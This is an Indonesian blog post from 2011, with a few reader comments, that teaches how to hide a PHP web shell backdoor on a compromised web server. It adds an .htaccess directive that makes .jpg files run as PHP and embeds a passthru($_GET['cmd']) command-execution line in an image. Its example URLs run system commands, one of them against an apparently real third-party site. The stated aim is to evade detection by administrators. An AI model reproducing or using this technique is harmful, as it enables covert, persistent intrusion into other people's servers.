Pages

17 April 2011

Menyembunyikan shell berekstensi .jpg atau .jpeg dengan .htaccess

Banyak orang yang beranggapan bahwa backdoor (BD) yang disembunyikan pada web server sebuah website sudah di rasa aman dan tidak mungkin diketahui oleh admin maupun orang lain. Tetapi pada kenyataannya semua shell yang berekstensi .php pada sebuah web server dapat begituh mudah diketahui oleh sang Admin dan akan langsung di delete. Namun tidak demikian hal nya jika kita menyembunyikan shell kita dengan ekstensi .jpg atau .jpeg.

OK langsung saja,....

tambahkan kode berikut pada file .htaccess jika filenya tidak ada maka buatlah :p
AddType application/x-httpd-php .jpg
lalu ambil sebuah gambar yang ber-ekstensi .jpeg atau .jpg lalu masukkan kode berikut pada gambar tadi

passthru($_GET['cmd']);
?>
dan upload satu direktori dengan file .htaccess

sekarang coba bukalah URL tempat file image tadi berada,
contoh :
http://example.com/images/logo.jpg?cmd=net%20user
sebagai contoh lain saya mengambil target yang dipinjamkan oleh Om Oghie
http://www.harvesthowl.org/test.jpg?cmd=dir

Referensi :
http://www.google.co.id
http://itsecuritylab.eu/

4 comments:

oGHie said...

keren tutornya kk

D4wFl1N said...

@oGHie : makasih kaka udah mampir dan makasih juga buat shell nya :D

Unknown said...

mantap gan ...sukses selalu ...
Nitip ya: http://peace-reggae.blogspot.com/

Firman Hadi said...

mantap.